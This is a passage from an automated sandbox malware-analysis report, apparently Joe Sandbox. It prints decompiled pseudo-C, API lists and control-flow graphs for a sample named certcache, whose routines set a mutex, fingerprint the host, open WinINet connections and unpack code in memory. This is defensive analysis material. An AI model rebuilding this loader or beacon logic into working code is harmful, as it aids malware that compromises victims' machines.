    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t24);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *__edi != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 001386C5
    • HeapFree.KERNEL32(00000000), ref: 001386CC
    • InternetCloseHandle.WININET(?), ref: 001386D5
    • InternetCloseHandle.WININET(?), ref: 001386DE
    • InternetCloseHandle.WININET(?), ref: 001386E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
    • HeapFree.KERNEL32(00000000), ref: 001386F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
    • HeapFree.KERNEL32(00000000), ref: 00138708
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 154 138bfa-138c4c GetModuleFileNameW lstrlenW 155 138c4e 154->155 156 138c68-138c75 call 132140 154->156 157 138c50-138c54 155->157 163 138c77-138c79 156->163 164 138c98-138cb2 GetProcessHeap RtlAllocateHeap 156->164 159 138c56-138c61 157->159 160 138c65 157->160 159->157 162 138c63 159->162 160->156 162->156 167 138c80-138c91 lstrlenW 163->167 165 138cb8-138cbd 164->165 166 138d7a 164->166 168 138cbf 165->168 169 138d04 165->169 167->167 170 138c93-138c96 167->170 171 138cc0-138ccd lstrcmpiW 168->171 169->166 170->164 172 138ccf-138cf9 lstrcpyW lstrlenW 171->172 173 138cfb 171->173 174 138cfe-138d02 172->174 173->174 174->169 174->171
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00138C28
    • lstrlenW.KERNEL32(?), ref: 00138C35
    • lstrlenW.KERNEL32(00000004), ref: 00138C84
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00138CA0
    • RtlAllocateHeap.NTDLL(00000000), ref: 00138CA7
    • lstrcmpiW.KERNEL32(00000004,?), ref: 00138CC5
    • lstrcpyW.KERNEL32(00000000,00000004), ref: 00138CDA
    • lstrlenW.KERNEL32(00000004), ref: 00138CE4
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 38%
    			E001385DF(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
    				signed char* _t28;
    				void* _t30;
    				void* _t41;
    				void _t49;
    				intOrPtr _t52;
    				void* _t53;
    				signed char* _t56;
    				void* _t58;
    				intOrPtr* _t64;
    				void* _t66;
    				void* _t67;
    				void* _t69;
    
    				_t64 = __edi;
    				_t53 = __ebx;
    				asm("lahf");
    				asm("int3");
    				L00131830(__ecx, __edx);
    				_t56 =  *0x13c298; // 0x131280
    				_t66 =  *(_t69 + 8);
    				_t2 =  &(_t56[1]); // 0xa8d4059f
    				_t3 =  &(_t56[2]); // 0x1ba8d405
    				_t4 =  &(_t56[3]); // 0x1ba8d4
    				 *0x13c20c(_t69 - 0xb8, 0x40, _t66,  *_t4 & 0x000000ff,  *_t3 & 0x000000ff,  *_t2 & 0x000000ff,  *_t56 & 0x000000ff);
    				HeapFree(GetProcessHeap(), 0, _t66);
    				_t28 =  *0x13c298; // 0x131280
    				_t61 = _t69 - 0xb8;
    				_push(_t56);
    				_t57 = _t69 - 0x38;
    				_t8 =  &(_t28[4]); // 0x1ba8
    				_push( *_t8 & 0x0000ffff); // executed
    				_t30 = L00131C50(_t69 - 0x38, _t69 - 0xb8, _t64); // executed
    				_t67 =  *(_t69 - 8);
    				if(_t30 != 0) {
    					goto 0x14165c;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3"); // executed
    					_t41 = L00131D40(_t57); // executed
    					if(_t41 != 0) {
    						goto 0x141674;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						if(L00131E80(_t41, _t57, _t61) != 0) {
    							goto 0x14168c;
    							asm("int3");
    							asm("int3");
    							if(L00132560(_t61, _t64) != 0) {
    								_t58 =  *(_t69 - 0x10);
    								_t49 =  *_t58;
    								 *_t53 = _t49;
    								if(_t49 < 0x4000000) {
    									_push(_t53);
    									_t52 = L00138500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
    									_t58 =  *(_t69 - 0x10);
    									 *_t64 = _t52;
    								}
    								HeapFree(GetProcessHeap(), 0, _t58);
    							}
    							HeapFree(GetProcessHeap(), ??, ??);
    						}
    						InternetCloseHandle( *(_t69 - 0x30));
    					}
    					InternetCloseHandle( *(_t69 - 0x34)); // executed
    					InternetCloseHandle( *(_t69 - 0x38)); // executed
    				}
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t67);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t64 != 0x00000000;
    			}

    APIs
    • _snwprintf.NTDLL ref: 0013860C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00138618
    • HeapFree.KERNEL32(00000000), ref: 0013861F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
    • HeapFree.KERNEL32(00000000), ref: 001386F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
    • HeapFree.KERNEL32(00000000), ref: 00138708
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 34%
    			E00139569(signed short __edx, void* __edi, void* __esi) {
    				void* _t8;
    				int _t13;
    				signed int _t20;
    				void* _t24;
    				signed short* _t26;
    				signed short _t27;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    
    				_t29 = __esi;
    				_t28 = __edi;
    				_t27 = __edx;
    				_t8 = MapViewOfFile(??, ??, ??, ??, ??); // executed
    				_t24 = _t8;
    				if(_t24 != 0) {
    					 *0x13cbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
    					UnmapViewOfFile(_t24);
    				}
    				CloseHandle(_t28);
    				CloseHandle(_t29);
    				 *(_t31 - 8) = 0x10;
    				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8); // executed
    				if(_t13 != 0) {
    					_t26 = _t31 - 0x28;
    					if( *(_t31 - 0x28) != 0) {
    						goto 0x1419f0;
    						asm("int3");
    						do {
    							_t20 =  *_t26 & 0x0000ffff;
    							if(_t20 < 0x30 || _t20 > 0x39) {
    								if(_t20 < 0x61 || _t20 > 0x7a) {
    									if(_t20 < 0x41 || _t20 > 0x5a) {
    										 *_t26 = _t27;
    									}
    								}
    							}
    							_t26 =  &(_t26[1]);
    						} while ( *_t26 != 0);
    					}
    					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t30 == 0) {
    						_t30 =  *(_t31 - 8);
    					} else {
    						goto 0x141a04;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("lahf");
    						asm("int3");
    						E00131790(_t26, _t27);
    						_t32 = _t32 + 8;
    					}
    					 *0x13c1f8("216554_6C0D37D2", 0x104, _t30, _t31 - 0x28,  *0x13c3ac);
    					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
    				}
    				goto 0x141a1e;
    				return _t13;
    			}

    APIs
    • MapViewOfFile.KERNELBASE ref: 00139569
    • GetFileSize.KERNEL32(?,00000000), ref: 00139578
    • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00139582
    • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0013958E
    • CloseHandle.KERNEL32 ref: 00139595
    • CloseHandle.KERNEL32 ref: 0013959C
    • GetComputerNameW.KERNEL32(?,?), ref: 001395B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00139601
    • RtlAllocateHeap.NTDLL(00000000), ref: 00139608
    • _snprintf.NTDLL ref: 00139642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
    • HeapFree.KERNEL32(00000000), ref: 00139655
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 59%
    			E0013866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void* _t10;
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t32 = __ebx;
    				if(L00131E80(_t10, __ecx, __edx) != 0) {
    					goto 0x14168c;
    					asm("int3");
    					asm("int3");
    					if(L00132560(__edx, _t40) != 0) {
    						_t35 =  *(_t44 - 0x10);
    						_t28 =  *_t35;
    						 *_t32 = _t28;
    						if(_t28 < 0x4000000) {
    							_push(_t32);
    							_t31 = L00138500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    							_t35 =  *(_t44 - 0x10);
    							 *_t40 = _t31;
    						}
    						HeapFree(GetProcessHeap(), 0, _t35);
    					}
    					HeapFree(GetProcessHeap(), ??, ??);
    				}
    				InternetCloseHandle( *(_t44 - 0x30));
    				InternetCloseHandle( *(_t44 - 0x34)); // executed
    				InternetCloseHandle( *(_t44 - 0x38)); // executed
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}

    APIs
    • InternetCloseHandle.WININET(?), ref: 001386D5
    • InternetCloseHandle.WININET(?), ref: 001386DE
    • InternetCloseHandle.WININET(?), ref: 001386E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
    • HeapFree.KERNEL32(00000000), ref: 001386F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
    • HeapFree.KERNEL32(00000000), ref: 00138708
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd

    Control-flow Graph

    control_flow_graph 251 131670-131688 CreateMutexW 252 131699-1316a4 GetLastError 251->252 253 13168a-131691 CloseHandle 251->253 254 1316a6-1316bb SetEvent CloseHandle * 2 call 139ca0 252->254 255 1316cb 252->255 253->252 258 1316c0-1316ca 254->258
    C-Code - Quality: 100%
    			E00131670(signed int __eax, void* __ebx, void* __esi) {
    				signed int _t38;
    
    				_t38 = __eax %  *(__esi + __ebx - 0x17);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 45%
    			E00138656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void* _t10;
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t37 = __edx;
    				_t32 = __ebx;
    				_t10 = L00131D40(__ecx); // executed
    				if(_t10 != 0) {
    					goto 0x141674;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					if(L00131E80(_t10, __ecx, _t37) != 0) {
    						goto 0x14168c;
    						asm("int3");
    						asm("int3");
    						if(L00132560(_t37, _t40) != 0) {
    							_t35 =  *(_t44 - 0x10);
    							_t28 =  *_t35;
    							 *_t32 = _t28;
    							if(_t28 < 0x4000000) {
    								_push(_t32);
    								_t31 = L00138500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    								_t35 =  *(_t44 - 0x10);
    								 *_t40 = _t31;
    							}
    							HeapFree(GetProcessHeap(), 0, _t35);
    						}
    						HeapFree(GetProcessHeap(), ??, ??);
    					}
    					InternetCloseHandle( *(_t44 - 0x30));
    				}
    				InternetCloseHandle( *(_t44 - 0x34)); // executed
    				InternetCloseHandle( *(_t44 - 0x38)); // executed
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}

    APIs
    • InternetCloseHandle.WININET(?), ref: 001386DE
    • InternetCloseHandle.WININET(?), ref: 001386E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
    • HeapFree.KERNEL32(00000000), ref: 001386F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
    • HeapFree.KERNEL32(00000000), ref: 00138708
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 0013944F
    • HeapFree.KERNEL32(00000000), ref: 00139456
    • SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\SysWOW64), ref: 00139492
    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\SysWOW64), ref: 001394A8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • lstrcmp.KERNEL32(face,book), ref: 0012203A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_120000_certcache.jbxd
    C-Code - Quality: 58%
    			E00139F9D() {
    				void* _t5;
    				void* _t6;
    				void* _t7;
    
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t7); // executed
    				L001315B0(_t5, _t6); // executed
    				ExitProcess(0);
    			}

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 52%
    			E00122663(intOrPtr _a4) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v40;
    				long _v44;
    				char _v76;
    				intOrPtr _v80;
    				DWORD* _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr* _v96;
    				void* _v100;
    				intOrPtr _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr* _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				int _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				signed int _v164;
    				signed int _v168;
    				intOrPtr _v172;
    				int _v176;
    				intOrPtr _v180;
    				char _v184;
    				intOrPtr _t100;
    				intOrPtr _t107;
    				intOrPtr _t108;
    				int _t113;
    				int _t131;
    				void* _t135;
    				intOrPtr _t157;
    				intOrPtr _t159;
    				char* _t160;
    				intOrPtr _t161;
    				void* _t164;
    				intOrPtr _t183;
    				unsigned int _t186;
    				intOrPtr _t192;
    				void* _t206;
    				intOrPtr _t210;
    
    				_t100 = _a4;
    				_v44 = 0;
    				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
    				_v184 = _t135;
    				_v180 = _t100;
    				_v80 = _t100;
    				_v84 =  &_v44;
    				_v88 =  *((intOrPtr*)(_t100 + 0x20));
    				_v92 =  *((intOrPtr*)(_t100 + 0x40));
    				_v96 = _t100 + 0x3c;
    				_v100 = _t135;
    				E001223F0(); // executed
    				E0012188A(_v100);
    				_t210 = _t206 - 8 + 8 - 4 + 4;
    				_t164 = _v100;
    				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
    				_v104 = _t164 + _t192;
    				_v108 = _v100 + 0x3c;
    				_v112 = 0x18;
    				if(_t192 + 0xffffffc0 <= 0xfc0) {
    					_t161 = _v104;
    					_t134 =  ==  ? _t161 + 0x18 : 0x18;
    					_v112 =  ==  ? _t161 + 0x18 : 0x18;
    				}
    				_v116 = _v112;
    				if(_v92 == 0) {
    					L4:
    					_v140 =  *_v96;
    					_v144 = 0;
    					do {
    						_t107 = _v144;
    						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
    						_t108 = _t107 + 1;
    						_v144 = _t108;
    					} while (_t108 != 0x400);
    					_t110 =  ==  ? _v100 +  *_v108 : 0;
    					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
    					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
    					_t183 = _v80;
    					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
    					_v36 =  *((intOrPtr*)(_t183 + 0x70));
    					_v32 =  *((intOrPtr*)(_t183 + 0x74));
    					_v28 =  *((intOrPtr*)(_t183 + 0x68));
    					_v24 =  *((intOrPtr*)(_t183 + 0x64));
    					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
    					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
    					_v184 = 0;
    					_v180 = 0x78;
    					_v148 = _t113;
    					_v152 = 0;
    					_v156 = 0x78;
    					E0012104C();
    					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
    					goto __eax;
    				} else {
    					_t160 =  &_v76;
    					_t203 =  ==  ? _v104 : 0;
    					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
    					_v124 = _t160;
    					_v128 = _t160 + 0x10;
    					_v132 = _t160;
    					_v136 = 0;
    					while(1) {
    						_t157 = _v120;
    						_t186 =  *(_t157 + 0x24);
    						_v160 = _v136;
    						_v164 = _t186 >> 0x0000001e & 0x00000001;
    						_v168 = _t186 >> 0x1f;
    						 *_v124 = 1;
    						asm("movaps xmm0, [0x1240e0]");
    						asm("movups [eax], xmm0");
    						_v172 = _t157;
    						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
    						_t159 = _v160 + 1;
    						_v176 = _t131;
    						_v120 = _v172 + 0x28;
    						_v136 = _t159;
    						if(_t159 == _v92) {
    							goto L4;
    						}
    					}
    					goto L4;
    				}
    			}

    APIs
      • Part of subcall function 001223F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00122428
    • VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 001227B1
    • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 001228B6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_120000_certcache.jbxd
    C-Code - Quality: 47%
    			E00139F42() {
    				void* _t6;
    				void* _t11;
    				void* _t12;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    
    				L00131B10(E00131BE0(_t11, _t12, _t18, _t19), 0x1311f0, _t18, _t19);
    				_push(0x13c0d0);
    				_push(0x64df2dad);
    				_push(0x48);
    				_t15 = E00131BE0(_t11, 0x8f7ee672, _t18, _t19);
    				L00131B10(_t3, 0x1310d0, _t18, _t19);
    				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
    				_t20 = _t6;
    				if(_t20 == 0) {
    					L3:
    					ExitProcess(0);
    				}
    				goto 0x141d52;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				memset();
    				HeapFree(GetProcessHeap(), 0, _t20); // executed
    				L001315B0(_t11, _t15); // executed
    				goto L3;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,08000000), ref: 00139F82
    • RtlAllocateHeap.NTDLL(00000000), ref: 00139F89
    • ExitProcess.KERNEL32 ref: 00139FBD
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • CreateFileMappingW.KERNELBASE ref: 00139554
    • CloseHandle.KERNEL32 ref: 0013959C
    • GetComputerNameW.KERNEL32(?,?), ref: 001395B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00139601
    • RtlAllocateHeap.NTDLL(00000000), ref: 00139608
    • _snprintf.NTDLL ref: 00139642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
    • HeapFree.KERNEL32(00000000), ref: 00139655
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 77%
    			E00131E20(void* __edi, void* __esi) {
    				int _t11;
    				DWORD* _t18;
    				void* _t20;
    
    				L0:
    				GetLastError();
    				_t18 = __esi - 1;
    				if(_t18 != 0) {
    					goto L0;
    				}
    				 *(_t20 + 0x10) = 4;
    				if(HttpQueryInfoW( *(__edi + 8), 0x20000013, __edi + 0x10, _t20 + 0x10, _t18) == 0) {
    					_t11 = InternetCloseHandle( *(__edi + 8)); // executed
    					goto 0x140378;
    					asm("int3");
    					asm("int3");
    					asm("int3");
    					return _t11;
    				} else {
    					do {
    						GetLastError();
    						_t18 = _t18 - 1;
    					} while (_t18 != 0);
    					return  &(_t18[0]);
    				}
    			}

    APIs
    • GetLastError.KERNEL32 ref: 00131E20
    • HttpQueryInfoW.WININET(?,20000013,00000004,?), ref: 00131E41
    • InternetCloseHandle.WININET(?), ref: 00131E66
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 23%
    			E00138BB5(WCHAR** __ebx, short __edi) {
    				WCHAR* _t5;
    				WCHAR* _t11;
    				void* _t12;
    
    				_t5 = RtlAllocateHeap(GetProcessHeap()); // executed
    				_t11 = _t5;
    				if(_t11 != 0) {
    					_t2 =  &(_t11[2]); // 0x4
    					_t5 = lstrcpyW(_t2,  *(_t12 + 8));
    					_t11[0x106] = __edi;
    					 *_t11 =  *__ebx;
    					 *__ebx = _t11;
    				}
    				goto 0x141836;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				return;
    				__ah = __ah + __cl;
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 00138BB5
    • RtlAllocateHeap.NTDLL(00000000), ref: 00138BBC
    • lstrcpyW.KERNEL32(00000004,?), ref: 00138BCF
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • InternetOpenW.WININET ref: 00131CE2
    • GetProcessHeap.KERNEL32(00000000), ref: 00131CED
    • HeapFree.KERNEL32(00000000), ref: 00131CF4
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 100%
    			E001327C6(signed int __eax) {
    				long _t3;
    				void* _t5;
    				void* _t6;
    
    				_t3 = __eax *  *(_t6 + 0x10);
    				_t5 = RtlAllocateHeap(GetProcessHeap(), 8, _t3); // executed
    				return _t5;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001327CD
    • RtlAllocateHeap.NTDLL(00000000), ref: 001327D4
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 86%
    			E001384C0(void* __ebx, void* __esi, void* __eflags) {
    				void* _t1;
    				void* _t2;
    				void* _t11;
    
    				_t11 = __esi;
    				_t1 = L001329E0(__esi, __ebx); // executed
    				if(_t1 == 0) {
    					_t2 = _t11;
    					goto 0x1415b0;
    					asm("int3");
    					return _t2;
    				} else {
    					HeapFree(GetProcessHeap(), 0, _t11);
    					return 0;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 001384D3
    • HeapFree.KERNEL32(00000000), ref: 001384DA
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 18%
    			E00139305(WCHAR* __ecx) {
    				void* _t7;
    				short* _t8;
    				WCHAR* _t13;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				void* _t17;
    
    				_t13 = __ecx;
    				if(GetWindowsDirectoryW(??, ??) == 0) {
    					L8:
